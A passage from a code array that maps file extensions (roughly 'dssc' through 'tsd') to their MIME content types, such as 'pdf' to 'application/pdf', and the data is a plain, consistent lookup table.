'text/prs.lines.tag', 'dssc' => 'application/dssc+der', 'dtb' => 'application/x-dtbook+xml', 'dtd' => 'application/xml-dtd', 'dts' => 'audio/vnd.dts', 'dtshd' => 'audio/vnd.dts.hd', 'dump' => 'application/octet-stream', 'dvb' => 'video/vnd.dvb.file', 'dvi' => 'application/x-dvi', 'dwd' => 'application/atsc-dwd+xml', 'dwf' => 'model/vnd.dwf', 'dwg' => 'image/vnd.dwg', 'dxf' => 'image/vnd.dxf', 'dxp' => 'application/vnd.spotfire.dxp', 'dxr' => 'application/x-director', 'ear' => 'application/java-archive', 'ecelp4800' => 'audio/vnd.nuera.ecelp4800', 'ecelp7470' => 'audio/vnd.nuera.ecelp7470', 'ecelp9600' => 'audio/vnd.nuera.ecelp9600', 'ecma' => 'application/ecmascript', 'edm' => 'application/vnd.novadigm.edm', 'edx' => 'application/vnd.novadigm.edx', 'efif' => 'application/vnd.picsel', 'ei6' => 'application/vnd.pg.osasli', 'elc' => 'application/octet-stream', 'emf' => 'image/emf', 'eml' => 'message/rfc822', 'emma' => 'application/emma+xml', 'emotionml' => 'application/emotionml+xml', 'emz' => 'application/x-msmetafile', 'eol' => 'audio/vnd.digital-winds', 'eot' => 'application/vnd.ms-fontobject', 'eps' => 'application/postscript', 'epub' => 'application/epub+zip', 'es3' => 'application/vnd.eszigno3+xml', 'esa' => 'application/vnd.osgi.subsystem', 'esf' => 'application/vnd.epson.esf', 'et3' => 'application/vnd.eszigno3+xml', 'etx' => 'text/x-setext', 'eva' => 'application/x-eva', 'evy' => 'application/x-envoy', 'exe' => 'application/octet-stream', 'exi' => 'application/exi', 'exp' => 'application/express', 'exr' => 'image/aces', 'ext' => 'application/vnd.novadigm.ext', 'ez' => 'application/andrew-inset', 'ez2' => 'application/vnd.ezpix-album', 'ez3' => 'application/vnd.ezpix-package', 'f' => 'text/x-fortran', 'f4v' => 'video/mp4', 'f77' => 'text/x-fortran', 'f90' => 'text/x-fortran', 'fbs' => 'image/vnd.fastbidsheet', 'fcdt' => 'application/vnd.adobe.formscentral.fcdt', 'fcs' => 'application/vnd.isac.fcs', 'fdf' => 'application/vnd.fdf', 'fdt' => 'application/fdt+xml', 'fe_launch' => 'application/vnd.denovo.fcselayout-link', 'fg5' => 'application/vnd.fujitsu.oasysgp', 'fgd' => 'application/x-director', 'fh' => 'image/x-freehand', 'fh4' => 'image/x-freehand', 'fh5' => 'image/x-freehand', 'fh7' => 'image/x-freehand', 'fhc' => 'image/x-freehand', 'fig' => 'application/x-xfig', 'fits' => 'image/fits', 'flac' => 'audio/x-flac', 'fli' => 'video/x-fli', 'flo' => 'application/vnd.micrografx.flo', 'flv' => 'video/x-flv', 'flw' => 'application/vnd.kde.kivio', 'flx' => 'text/vnd.fmi.flexstor', 'fly' => 'text/vnd.fly', 'fm' => 'application/vnd.framemaker', 'fnc' => 'application/vnd.frogans.fnc', 'fo' => 'application/vnd.software602.filler.form+xml', 'for' => 'text/x-fortran', 'fpx' => 'image/vnd.fpx', 'frame' => 'application/vnd.framemaker', 'fsc' => 'application/vnd.fsc.weblaunch', 'fst' => 'image/vnd.fst', 'ftc' => 'application/vnd.fluxtime.clip', 'fti' => 'application/vnd.anser-web-funds-transfer-initiation', 'fvt' => 'video/vnd.fvt', 'fxp' => 'application/vnd.adobe.fxp', 'fxpl' => 'application/vnd.adobe.fxp', 'fzs' => 'application/vnd.fuzzysheet', 'g2w' => 'application/vnd.geoplan', 'g3' => 'image/g3fax', 'g3w' => 'application/vnd.geospace', 'gac' => 'application/vnd.groove-account', 'gam' => 'application/x-tads', 'gbr' => 'application/rpki-ghostbusters', 'gca' => 'application/x-gca-compressed', 'gdl' => 'model/vnd.gdl', 'gdoc' => 'application/vnd.google-apps.document', 'ged' => 'text/vnd.familysearch.gedcom', 'geo' => 'application/vnd.dynageo', 'geojson' => 'application/geo+json', 'gex' => 'application/vnd.geometry-explorer', 'ggb' => 'application/vnd.geogebra.file', 'ggt' => 'application/vnd.geogebra.tool', 'ghf' => 'application/vnd.groove-help', 'gif' => 'image/gif', 'gim' => 'application/vnd.groove-identity-message', 'glb' => 'model/gltf-binary', 'gltf' => 'model/gltf+json', 'gml' => 'application/gml+xml', 'gmx' => 'application/vnd.gmx', 'gnumeric' => 'application/x-gnumeric', 'gpg' => 'application/gpg-keys', 'gph' => 'application/vnd.flographit', 'gpx' => 'application/gpx+xml', 'gqf' => 'application/vnd.grafeq', 'gqs' => 'application/vnd.grafeq', 'gram' => 'application/srgs', 'gramps' => 'application/x-gramps-xml', 'gre' => 'application/vnd.geometry-explorer', 'grv' => 'application/vnd.groove-injector', 'grxml' => 'application/srgs+xml', 'gsf' => 'application/x-font-ghostscript', 'gsheet' => 'application/vnd.google-apps.spreadsheet', 'gslides' => 'application/vnd.google-apps.presentation', 'gtar' => 'application/x-gtar', 'gtm' => 'application/vnd.groove-tool-message', 'gtw' => 'model/vnd.gtw', 'gv' => 'text/vnd.graphviz', 'gxf' => 'application/gxf', 'gxt' => 'application/vnd.geonext', 'gz' => 'application/gzip', 'gzip' => 'application/gzip', 'h' => 'text/x-c', 'h261' => 'video/h261', 'h263' => 'video/h263', 'h264' => 'video/h264', 'hal' => 'application/vnd.hal+xml', 'hbci' => 'application/vnd.hbci', 'hbs' => 'text/x-handlebars-template', 'hdd' => 'application/x-virtualbox-hdd', 'hdf' => 'application/x-hdf', 'heic' => 'image/heic', 'heics' => 'image/heic-sequence', 'heif' => 'image/heif', 'heifs' => 'image/heif-sequence', 'hej2' => 'image/hej2k', 'held' => 'application/atsc-held+xml', 'hh' => 'text/x-c', 'hjson' => 'application/hjson', 'hlp' => 'application/winhlp', 'hpgl' => 'application/vnd.hp-hpgl', 'hpid' => 'application/vnd.hp-hpid', 'hps' => 'application/vnd.hp-hps', 'hqx' => 'application/mac-binhex40', 'hsj2' => 'image/hsj2', 'htc' => 'text/x-component', 'htke' => 'application/vnd.kenameaapp', 'htm' => 'text/html', 'html' => 'text/html', 'hvd' => 'application/vnd.yamaha.hv-dic', 'hvp' => 'application/vnd.yamaha.hv-voice', 'hvs' => 'application/vnd.yamaha.hv-script', 'i2g' => 'application/vnd.intergeo', 'icc' => 'application/vnd.iccprofile', 'ice' => 'x-conference/x-cooltalk', 'icm' => 'application/vnd.iccprofile', 'ico' => 'image/x-icon', 'ics' => 'text/calendar', 'ief' => 'image/ief', 'ifb' => 'text/calendar', 'ifm' => 'application/vnd.shana.informed.formdata', 'iges' => 'model/iges', 'igl' => 'application/vnd.igloader', 'igm' => 'application/vnd.insors.igm', 'igs' => 'model/iges', 'igx' => 'application/vnd.micrografx.igx', 'iif' => 'application/vnd.shana.informed.interchange', 'img' => 'application/octet-stream', 'imp' => 'application/vnd.accpac.simply.imp', 'ims' => 'application/vnd.ms-ims', 'in' => 'text/plain', 'ini' => 'text/plain', 'ink' => 'application/inkml+xml', 'inkml' => 'application/inkml+xml', 'install' => 'application/x-install-instructions', 'iota' => 'application/vnd.astraea-software.iota', 'ipfix' => 'application/ipfix', 'ipk' => 'application/vnd.shana.informed.package', 'irm' => 'application/vnd.ibm.rights-management', 'irp' => 'application/vnd.irepository.package+xml', 'iso' => 'application/x-iso9660-image', 'itp' => 'application/vnd.shana.informed.formtemplate', 'its' => 'application/its+xml', 'ivp' => 'application/vnd.immervision-ivp', 'ivu' => 'application/vnd.immervision-ivu', 'jad' => 'text/vnd.sun.j2me.app-descriptor', 'jade' => 'text/jade', 'jam' => 'application/vnd.jam', 'jar' => 'application/java-archive', 'jardiff' => 'application/x-java-archive-diff', 'java' => 'text/x-java-source', 'jhc' => 'image/jphc', 'jisp' => 'application/vnd.jisp', 'jls' => 'image/jls', 'jlt' => 'application/vnd.hp-jlyt', 'jng' => 'image/x-jng', 'jnlp' => 'application/x-java-jnlp-file', 'joda' => 'application/vnd.joost.joda-archive', 'jp2' => 'image/jp2', 'jpe' => 'image/jpeg', 'jpeg' => 'image/jpeg', 'jpf' => 'image/jpx', 'jpg' => 'image/jpeg', 'jpg2' => 'image/jp2', 'jpgm' => 'video/jpm', 'jpgv' => 'video/jpeg', 'jph' => 'image/jph', 'jpm' => 'video/jpm', 'jpx' => 'image/jpx', 'js' => 'application/javascript', 'json' => 'application/json', 'json5' => 'application/json5', 'jsonld' => 'application/ld+json', 'jsonml' => 'application/jsonml+json', 'jsx' => 'text/jsx', 'jt' => 'model/jt', 'jxr' => 'image/jxr', 'jxra' => 'image/jxra', 'jxrs' => 'image/jxrs', 'jxs' => 'image/jxs', 'jxsc' => 'image/jxsc', 'jxsi' => 'image/jxsi', 'jxss' => 'image/jxss', 'kar' => 'audio/midi', 'karbon' => 'application/vnd.kde.karbon', 'kdb' => 'application/octet-stream', 'kdbx' => 'application/x-keepass2', 'key' => 'application/x-iwork-keynote-sffkey', 'kfo' => 'application/vnd.kde.kformula', 'kia' => 'application/vnd.kidspiration', 'kml' => 'application/vnd.google-earth.kml+xml', 'kmz' => 'application/vnd.google-earth.kmz', 'kne' => 'application/vnd.kinar', 'knp' => 'application/vnd.kinar', 'kon' => 'application/vnd.kde.kontour', 'kpr' => 'application/vnd.kde.kpresenter', 'kpt' => 'application/vnd.kde.kpresenter', 'kpxx' => 'application/vnd.ds-keypoint', 'ksp' => 'application/vnd.kde.kspread', 'ktr' => 'application/vnd.kahootz', 'ktx' => 'image/ktx', 'ktx2' => 'image/ktx2', 'ktz' => 'application/vnd.kahootz', 'kwd' => 'application/vnd.kde.kword', 'kwt' => 'application/vnd.kde.kword', 'lasxml' => 'application/vnd.las.las+xml', 'latex' => 'application/x-latex', 'lbd' => 'application/vnd.llamagraphics.life-balance.desktop', 'lbe' => 'application/vnd.llamagraphics.life-balance.exchange+xml', 'les' => 'application/vnd.hhe.lesson-player', 'less' => 'text/less', 'lgr' => 'application/lgr+xml', 'lha' => 'application/octet-stream', 'link66' => 'application/vnd.route66.link66+xml', 'list' => 'text/plain', 'list3820' => 'application/vnd.ibm.modcap', 'listafp' => 'application/vnd.ibm.modcap', 'litcoffee' => 'text/coffeescript', 'lnk' => 'application/x-ms-shortcut', 'log' => 'text/plain', 'lostxml' => 'application/lost+xml', 'lrf' => 'application/octet-stream', 'lrm' => 'application/vnd.ms-lrm', 'ltf' => 'application/vnd.frogans.ltf', 'lua' => 'text/x-lua', 'luac' => 'application/x-lua-bytecode', 'lvp' => 'audio/vnd.lucent.voice', 'lwp' => 'application/vnd.lotus-wordpro', 'lzh' => 'application/octet-stream', 'm1v' => 'video/mpeg', 'm2a' => 'audio/mpeg', 'm2v' => 'video/mpeg', 'm3a' => 'audio/mpeg', 'm3u' => 'text/plain', 'm3u8' => 'application/vnd.apple.mpegurl', 'm4a' => 'audio/x-m4a', 'm4p' => 'application/mp4', 'm4s' => 'video/iso.segment', 'm4u' => 'application/vnd.mpegurl', 'm4v' => 'video/x-m4v', 'm13' => 'application/x-msmediaview', 'm14' => 'application/x-msmediaview', 'm21' => 'application/mp21', 'ma' => 'application/mathematica', 'mads' => 'application/mads+xml', 'maei' => 'application/mmt-aei+xml', 'mag' => 'application/vnd.ecowin.chart', 'maker' => 'application/vnd.framemaker', 'man' => 'text/troff', 'manifest' => 'text/cache-manifest', 'map' => 'application/json', 'mar' => 'application/octet-stream', 'markdown' => 'text/markdown', 'mathml' => 'application/mathml+xml', 'mb' => 'application/mathematica', 'mbk' => 'application/vnd.mobius.mbk', 'mbox' => 'application/mbox', 'mc1' => 'application/vnd.medcalcdata', 'mcd' => 'application/vnd.mcd', 'mcurl' => 'text/vnd.curl.mcurl', 'md' => 'text/markdown', 'mdb' => 'application/x-msaccess', 'mdi' => 'image/vnd.ms-modi', 'mdx' => 'text/mdx', 'me' => 'text/troff', 'mesh' => 'model/mesh', 'meta4' => 'application/metalink4+xml', 'metalink' => 'application/metalink+xml', 'mets' => 'application/mets+xml', 'mfm' => 'application/vnd.mfmp', 'mft' => 'application/rpki-manifest', 'mgp' => 'application/vnd.osgeo.mapguide.package', 'mgz' => 'application/vnd.proteus.magazine', 'mid' => 'audio/midi', 'midi' => 'audio/midi', 'mie' => 'application/x-mie', 'mif' => 'application/vnd.mif', 'mime' => 'message/rfc822', 'mj2' => 'video/mj2', 'mjp2' => 'video/mj2', 'mjs' => 'text/javascript', 'mk3d' => 'video/x-matroska', 'mka' => 'audio/x-matroska', 'mkd' => 'text/x-markdown', 'mks' => 'video/x-matroska', 'mkv' => 'video/x-matroska', 'mlp' => 'application/vnd.dolby.mlp', 'mmd' => 'application/vnd.chipnuts.karaoke-mmd', 'mmf' => 'application/vnd.smaf', 'mml' => 'text/mathml', 'mmr' => 'image/vnd.fujixerox.edmics-mmr', 'mng' => 'video/x-mng', 'mny' => 'application/x-msmoney', 'mobi' => 'application/x-mobipocket-ebook', 'mods' => 'application/mods+xml', 'mov' => 'video/quicktime', 'movie' => 'video/x-sgi-movie', 'mp2' => 'audio/mpeg', 'mp2a' => 'audio/mpeg', 'mp3' => 'audio/mpeg', 'mp4' => 'video/mp4', 'mp4a' => 'audio/mp4', 'mp4s' => 'application/mp4', 'mp4v' => 'video/mp4', 'mp21' => 'application/mp21', 'mpc' => 'application/vnd.mophun.certificate', 'mpd' => 'application/dash+xml', 'mpe' => 'video/mpeg', 'mpeg' => 'video/mpeg', 'mpf' => 'application/media-policy-dataset+xml', 'mpg' => 'video/mpeg', 'mpg4' => 'video/mp4', 'mpga' => 'audio/mpeg', 'mpkg' => 'application/vnd.apple.installer+xml', 'mpm' => 'application/vnd.blueice.multipass', 'mpn' => 'application/vnd.mophun.application', 'mpp' => 'application/vnd.ms-project', 'mpt' => 'application/vnd.ms-project', 'mpy' => 'application/vnd.ibm.minipay', 'mqy' => 'application/vnd.mobius.mqy', 'mrc' => 'application/marc', 'mrcx' => 'application/marcxml+xml', 'ms' => 'text/troff', 'mscml' => 'application/mediaservercontrol+xml', 'mseed' => 'application/vnd.fdsn.mseed', 'mseq' => 'application/vnd.mseq', 'msf' => 'application/vnd.epson.msf', 'msg' => 'application/vnd.ms-outlook', 'msh' => 'model/mesh', 'msi' => 'application/x-msdownload', 'msix' => 'application/msix', 'msixbundle' => 'application/msixbundle', 'msl' => 'application/vnd.mobius.msl', 'msm' => 'application/octet-stream', 'msp' => 'application/octet-stream', 'msty' => 'application/vnd.muvee.style', 'mtl' => 'model/mtl', 'mts' => 'model/vnd.mts', 'mus' => 'application/vnd.musician', 'musd' => 'application/mmt-usd+xml', 'musicxml' => 'application/vnd.recordare.musicxml+xml', 'mvb' => 'application/x-msmediaview', 'mvt' => 'application/vnd.mapbox-vector-tile', 'mwf' => 'application/vnd.mfer', 'mxf' => 'application/mxf', 'mxl' => 'application/vnd.recordare.musicxml', 'mxmf' => 'audio/mobile-xmf', 'mxml' => 'application/xv+xml', 'mxs' => 'application/vnd.triscape.mxs', 'mxu' => 'video/vnd.mpegurl', 'n-gage' => 'application/vnd.nokia.n-gage.symbian.install', 'n3' => 'text/n3', 'nb' => 'application/mathematica', 'nbp' => 'application/vnd.wolfram.player', 'nc' => 'application/x-netcdf', 'ncx' => 'application/x-dtbncx+xml', 'nfo' => 'text/x-nfo', 'ngdat' => 'application/vnd.nokia.n-gage.data', 'nitf' => 'application/vnd.nitf', 'nlu' => 'application/vnd.neurolanguage.nlu', 'nml' => 'application/vnd.enliven', 'nnd' => 'application/vnd.noblenet-directory', 'nns' => 'application/vnd.noblenet-sealer', 'nnw' => 'application/vnd.noblenet-web', 'npx' => 'image/vnd.net-fpx', 'nq' => 'application/n-quads', 'nsc' => 'application/x-conference', 'nsf' => 'application/vnd.lotus-notes', 'nt' => 'application/n-triples', 'ntf' => 'application/vnd.nitf', 'numbers' => 'application/x-iwork-numbers-sffnumbers', 'nzb' => 'application/x-nzb', 'oa2' => 'application/vnd.fujitsu.oasys2', 'oa3' => 'application/vnd.fujitsu.oasys3', 'oas' => 'application/vnd.fujitsu.oasys', 'obd' => 'application/x-msbinder', 'obgx' => 'application/vnd.openblox.game+xml', 'obj' => 'model/obj', 'oda' => 'application/oda', 'odb' => 'application/vnd.oasis.opendocument.database', 'odc' => 'application/vnd.oasis.opendocument.chart', 'odf' => 'application/vnd.oasis.opendocument.formula', 'odft' => 'application/vnd.oasis.opendocument.formula-template', 'odg' => 'application/vnd.oasis.opendocument.graphics', 'odi' => 'application/vnd.oasis.opendocument.image', 'odm' => 'application/vnd.oasis.opendocument.text-master', 'odp' => 'application/vnd.oasis.opendocument.presentation', 'ods' => 'application/vnd.oasis.opendocument.spreadsheet', 'odt' => 'application/vnd.oasis.opendocument.text', 'oga' => 'audio/ogg', 'ogex' => 'model/vnd.opengex', 'ogg' => 'audio/ogg', 'ogv' => 'video/ogg', 'ogx' => 'application/ogg', 'omdoc' => 'application/omdoc+xml', 'onepkg' => 'application/onenote', 'onetmp' => 'application/onenote', 'onetoc' => 'application/onenote', 'onetoc2' => 'application/onenote', 'opf' => 'application/oebps-package+xml', 'opml' => 'text/x-opml', 'oprc' => 'application/vnd.palm', 'opus' => 'audio/ogg', 'org' => 'text/x-org', 'osf' => 'application/vnd.yamaha.openscoreformat', 'osfpvg' => 'application/vnd.yamaha.openscoreformat.osfpvg+xml', 'osm' => 'application/vnd.openstreetmap.data+xml', 'otc' => 'application/vnd.oasis.opendocument.chart-template', 'otf' => 'font/otf', 'otg' => 'application/vnd.oasis.opendocument.graphics-template', 'oth' => 'application/vnd.oasis.opendocument.text-web', 'oti' => 'application/vnd.oasis.opendocument.image-template', 'otp' => 'application/vnd.oasis.opendocument.presentation-template', 'ots' => 'application/vnd.oasis.opendocument.spreadsheet-template', 'ott' => 'application/vnd.oasis.opendocument.text-template', 'ova' => 'application/x-virtualbox-ova', 'ovf' => 'application/x-virtualbox-ovf', 'owl' => 'application/rdf+xml', 'oxps' => 'application/oxps', 'oxt' => 'application/vnd.openofficeorg.extension', 'p' => 'text/x-pascal', 'p7a' => 'application/x-pkcs7-signature', 'p7b' => 'application/x-pkcs7-certificates', 'p7c' => 'application/pkcs7-mime', 'p7m' => 'application/pkcs7-mime', 'p7r' => 'application/x-pkcs7-certreqresp', 'p7s' => 'application/pkcs7-signature', 'p8' => 'application/pkcs8', 'p10' => 'application/x-pkcs10', 'p12' => 'application/x-pkcs12', 'pac' => 'application/x-ns-proxy-autoconfig', 'pages' => 'application/x-iwork-pages-sffpages', 'pas' => 'text/x-pascal', 'paw' => 'application/vnd.pawaafile', 'pbd' => 'application/vnd.powerbuilder6', 'pbm' => 'image/x-portable-bitmap', 'pcap' => 'application/vnd.tcpdump.pcap', 'pcf' => 'application/x-font-pcf', 'pcl' => 'application/vnd.hp-pcl', 'pclxl' => 'application/vnd.hp-pclxl', 'pct' => 'image/x-pict', 'pcurl' => 'application/vnd.curl.pcurl', 'pcx' => 'image/x-pcx', 'pdb' => 'application/x-pilot', 'pde' => 'text/x-processing', 'pdf' => 'application/pdf', 'pem' => 'application/x-x509-user-cert', 'pfa' => 'application/x-font-type1', 'pfb' => 'application/x-font-type1', 'pfm' => 'application/x-font-type1', 'pfr' => 'application/font-tdpfr', 'pfx' => 'application/x-pkcs12', 'pgm' => 'image/x-portable-graymap', 'pgn' => 'application/x-chess-pgn', 'pgp' => 'application/pgp', 'phar' => 'application/octet-stream', 'php' => 'application/x-httpd-php', 'php3' => 'application/x-httpd-php', 'php4' => 'application/x-httpd-php', 'phps' => 'application/x-httpd-php-source', 'phtml' => 'application/x-httpd-php', 'pic' => 'image/x-pict', 'pkg' => 'application/octet-stream', 'pki' => 'application/pkixcmp', 'pkipath' => 'application/pkix-pkipath', 'pkpass' => 'application/vnd.apple.pkpass', 'pl' => 'application/x-perl', 'plb' => 'application/vnd.3gpp.pic-bw-large', 'plc' => 'application/vnd.mobius.plc', 'plf' => 'application/vnd.pocketlearn', 'pls' => 'application/pls+xml', 'pm' => 'application/x-perl', 'pml' => 'application/vnd.ctc-posml', 'png' => 'image/png', 'pnm' => 'image/x-portable-anymap', 'portpkg' => 'application/vnd.macports.portpkg', 'pot' => 'application/vnd.ms-powerpoint', 'potm' => 'application/vnd.ms-powerpoint.presentation.macroEnabled.12', 'potx' => 'application/vnd.openxmlformats-officedocument.presentationml.template', 'ppa' => 'application/vnd.ms-powerpoint', 'ppam' => 'application/vnd.ms-powerpoint.addin.macroEnabled.12', 'ppd' => 'application/vnd.cups-ppd', 'ppm' => 'image/x-portable-pixmap', 'pps' => 'application/vnd.ms-powerpoint', 'ppsm' => 'application/vnd.ms-powerpoint.slideshow.macroEnabled.12', 'ppsx' => 'application/vnd.openxmlformats-officedocument.presentationml.slideshow', 'ppt' => 'application/powerpoint', 'pptm' => 'application/vnd.ms-powerpoint.presentation.macroEnabled.12', 'pptx' => 'application/vnd.openxmlformats-officedocument.presentationml.presentation', 'pqa' => 'application/vnd.palm', 'prc' => 'model/prc', 'pre' => 'application/vnd.lotus-freelance', 'prf' => 'application/pics-rules', 'provx' => 'application/provenance+xml', 'ps' => 'application/postscript', 'psb' => 'application/vnd.3gpp.pic-bw-small', 'psd' => 'application/x-photoshop', 'psf' => 'application/x-font-linux-psf', 'pskcxml' => 'application/pskc+xml', 'pti' => 'image/prs.pti', 'ptid' => 'application/vnd.pvi.ptid1', 'pub' => 'application/x-mspublisher', 'pvb' => 'application/vnd.3gpp.pic-bw-var', 'pwn' => 'application/vnd.3m.post-it-notes', 'pya' => 'audio/vnd.ms-playready.media.pya', 'pyo' => 'model/vnd.pytha.pyox', 'pyox' => 'model/vnd.pytha.pyox', 'pyv' => 'video/vnd.ms-playready.media.pyv', 'qam' => 'application/vnd.epson.quickanime', 'qbo' => 'application/vnd.intu.qbo', 'qfx' => 'application/vnd.intu.qfx', 'qps' => 'application/vnd.publishare-delta-tree', 'qt' => 'video/quicktime', 'qwd' => 'application/vnd.quark.quarkxpress', 'qwt' => 'application/vnd.quark.quarkxpress', 'qxb' => 'application/vnd.quark.quarkxpress', 'qxd' => 'application/vnd.quark.quarkxpress', 'qxl' => 'application/vnd.quark.quarkxpress', 'qxt' => 'application/vnd.quark.quarkxpress', 'ra' => 'audio/x-realaudio', 'ram' => 'audio/x-pn-realaudio', 'raml' => 'application/raml+yaml', 'rapd' => 'application/route-apd+xml', 'rar' => 'application/x-rar', 'ras' => 'image/x-cmu-raster', 'rcprofile' => 'application/vnd.ipunplugged.rcprofile', 'rdf' => 'application/rdf+xml', 'rdz' => 'application/vnd.data-vision.rdz', 'relo' => 'application/p2p-overlay+xml', 'rep' => 'application/vnd.businessobjects', 'res' => 'application/x-dtbresource+xml', 'rgb' => 'image/x-rgb', 'rif' => 'application/reginfo+xml', 'rip' => 'audio/vnd.rip', 'ris' => 'application/x-research-info-systems', 'rl' => 'application/resource-lists+xml', 'rlc' => 'image/vnd.fujixerox.edmics-rlc', 'rld' => 'application/resource-lists-diff+xml', 'rm' => 'audio/x-pn-realaudio', 'rmi' => 'audio/midi', 'rmp' => 'audio/x-pn-realaudio-plugin', 'rms' => 'application/vnd.jcp.javame.midlet-rms', 'rmvb' => 'application/vnd.rn-realmedia-vbr', 'rnc' => 'application/relax-ng-compact-syntax', 'rng' => 'application/xml', 'roa' => 'application/rpki-roa', 'roff' => 'text/troff', 'rp9' => 'application/vnd.cloanto.rp9', 'rpm' => 'audio/x-pn-realaudio-plugin', 'rpss' => 'application/vnd.nokia.radio-presets', 'rpst' => 'application/vnd.nokia.radio-preset', 'rq' => 'application/sparql-query', 'rs' => 'application/rls-services+xml', 'rsa' => 'application/x-pkcs7', 'rsat' => 'application/atsc-rsat+xml', 'rsd' => 'application/rsd+xml', 'rsheet' => 'application/urc-ressheet+xml', 'rss' => 'application/rss+xml', 'rtf' => 'text/rtf', 'rtx' => 'text/richtext', 'run' => 'application/x-makeself', 'rusd' => 'application/route-usd+xml', 'rv' => 'video/vnd.rn-realvideo', 's' => 'text/x-asm', 's3m' => 'audio/s3m', 'saf' => 'application/vnd.yamaha.smaf-audio', 'sass' => 'text/x-sass', 'sbml' => 'application/sbml+xml', 'sc' => 'application/vnd.ibm.secure-container', 'scd' => 'application/x-msschedule', 'scm' => 'application/vnd.lotus-screencam', 'scq' => 'application/scvp-cv-request', 'scs' => 'application/scvp-cv-response', 'scss' => 'text/x-scss', 'scurl' => 'text/vnd.curl.scurl', 'sda' => 'application/vnd.stardivision.draw', 'sdc' => 'application/vnd.stardivision.calc', 'sdd' => 'application/vnd.stardivision.impress', 'sdkd' => 'application/vnd.solent.sdkm+xml', 'sdkm' => 'application/vnd.solent.sdkm+xml', 'sdp' => 'application/sdp', 'sdw' => 'application/vnd.stardivision.writer', 'sea' => 'application/octet-stream', 'see' => 'application/vnd.seemail', 'seed' => 'application/vnd.fdsn.seed', 'sema' => 'application/vnd.sema', 'semd' => 'application/vnd.semd', 'semf' => 'application/vnd.semf', 'senmlx' => 'application/senml+xml', 'sensmlx' => 'application/sensml+xml', 'ser' => 'application/java-serialized-object', 'setpay' => 'application/set-payment-initiation', 'setreg' => 'application/set-registration-initiation', 'sfd-hdstx' => 'application/vnd.hydrostatix.sof-data', 'sfs' => 'application/vnd.spotfire.sfs', 'sfv' => 'text/x-sfv', 'sgi' => 'image/sgi', 'sgl' => 'application/vnd.stardivision.writer-global', 'sgm' => 'text/sgml', 'sgml' => 'text/sgml', 'sh' => 'application/x-sh', 'shar' => 'application/x-shar', 'shex' => 'text/shex', 'shf' => 'application/shf+xml', 'shtml' => 'text/html', 'sid' => 'image/x-mrsid-image', 'sieve' => 'application/sieve', 'sig' => 'application/pgp-signature', 'sil' => 'audio/silk', 'silo' => 'model/mesh', 'sis' => 'application/vnd.symbian.install', 'sisx' => 'application/vnd.symbian.install', 'sit' => 'application/x-stuffit', 'sitx' => 'application/x-stuffitx', 'siv' => 'application/sieve', 'skd' => 'application/vnd.koan', 'skm' => 'application/vnd.koan', 'skp' => 'application/vnd.koan', 'skt' => 'application/vnd.koan', 'sldm' => 'application/vnd.ms-powerpoint.slide.macroenabled.12', 'sldx' => 'application/vnd.openxmlformats-officedocument.presentationml.slide', 'slim' => 'text/slim', 'slm' => 'text/slim', 'sls' => 'application/route-s-tsid+xml', 'slt' => 'application/vnd.epson.salt', 'sm' => 'application/vnd.stepmania.stepchart', 'smf' => 'application/vnd.stardivision.math', 'smi' => 'application/smil', 'smil' => 'application/smil', 'smv' => 'video/x-smv', 'smzip' => 'application/vnd.stepmania.package', 'snd' => 'audio/basic', 'snf' => 'application/x-font-snf', 'so' => 'application/octet-stream', 'spc' => 'application/x-pkcs7-certificates', 'spdx' => 'text/spdx', 'spf' => 'application/vnd.yamaha.smaf-phrase', 'spl' => 'application/x-futuresplash', 'spot' => 'text/vnd.in3d.spot', 'spp' => 'application/scvp-vp-response', 'spq' => 'application/scvp-vp-request', 'spx' => 'audio/ogg', 'sql' => 'application/x-sql', 'src' => 'application/x-wais-source', 'srt' => 'application/x-subrip', 'sru' => 'application/sru+xml', 'srx' => 'application/sparql-results+xml', 'ssdl' => 'application/ssdl+xml', 'sse' => 'application/vnd.kodak-descriptor', 'ssf' => 'application/vnd.epson.ssf', 'ssml' => 'application/ssml+xml', 'sst' => 'application/octet-stream', 'st' => 'application/vnd.sailingtracker.track', 'stc' => 'application/vnd.sun.xml.calc.template', 'std' => 'application/vnd.sun.xml.draw.template', 'step' => 'application/STEP', 'stf' => 'application/vnd.wt.stf', 'sti' => 'application/vnd.sun.xml.impress.template', 'stk' => 'application/hyperstudio', 'stl' => 'model/stl', 'stp' => 'application/STEP', 'stpx' => 'model/step+xml', 'stpxz' => 'model/step-xml+zip', 'stpz' => 'model/step+zip', 'str' => 'application/vnd.pg.format', 'stw' => 'application/vnd.sun.xml.writer.template', 'styl' => 'text/stylus', 'stylus' => 'text/stylus', 'sub' => 'text/vnd.dvb.subtitle', 'sus' => 'application/vnd.sus-calendar', 'susp' => 'application/vnd.sus-calendar', 'sv4cpio' => 'application/x-sv4cpio', 'sv4crc' => 'application/x-sv4crc', 'svc' => 'application/vnd.dvb.service', 'svd' => 'application/vnd.svd', 'svg' => 'image/svg+xml', 'svgz' => 'image/svg+xml', 'swa' => 'application/x-director', 'swf' => 'application/x-shockwave-flash', 'swi' => 'application/vnd.aristanetworks.swi', 'swidtag' => 'application/swid+xml', 'sxc' => 'application/vnd.sun.xml.calc', 'sxd' => 'application/vnd.sun.xml.draw', 'sxg' => 'application/vnd.sun.xml.writer.global', 'sxi' => 'application/vnd.sun.xml.impress', 'sxm' => 'application/vnd.sun.xml.math', 'sxw' => 'application/vnd.sun.xml.writer', 't' => 'text/troff', 't3' => 'application/x-t3vm-image', 't38' => 'image/t38', 'taglet' => 'application/vnd.mynfc', 'tao' => 'application/vnd.tao.intent-module-archive', 'tap' => 'image/vnd.tencent.tap', 'tar' => 'application/x-tar', 'tcap' => 'application/vnd.3gpp2.tcap', 'tcl' => 'application/x-tcl', 'td' => 'application/urc-targetdesc+xml', 'teacher' => 'application/vnd.smart.teacher', 'tei' => 'application/tei+xml', 'teicorpus' => 'application/tei+xml', 'tex' => 'application/x-tex', 'texi' => 'application/x-texinfo', 'texinfo' => 'application/x-texinfo', 'text' => 'text/plain', 'tfi' => 'application/thraud+xml', 'tfm' => 'application/x-tex-tfm', 'tfx' => 'image/tiff-fx', 'tga' => 'image/x-tga', 'tgz' => 'application/x-tar', 'thmx' => 'application/vnd.ms-officetheme', 'tif' => 'image/tiff', 'tiff' => 'image/tiff', 'tk' => 'application/x-tcl', 'tmo' => 'application/vnd.tmobile-livetv', 'toml' => 'application/toml', 'torrent' => 'application/x-bittorrent', 'tpl' => 'application/vnd.groove-tool-template', 'tpt' => 'application/vnd.trid.tpt', 'tr' => 'text/troff', 'tra' => 'application/vnd.trueapp', 'trig' => 'application/trig', 'trm' => 'application/x-msterminal', 'ts' => 'video/mp2t', 'tsd' => 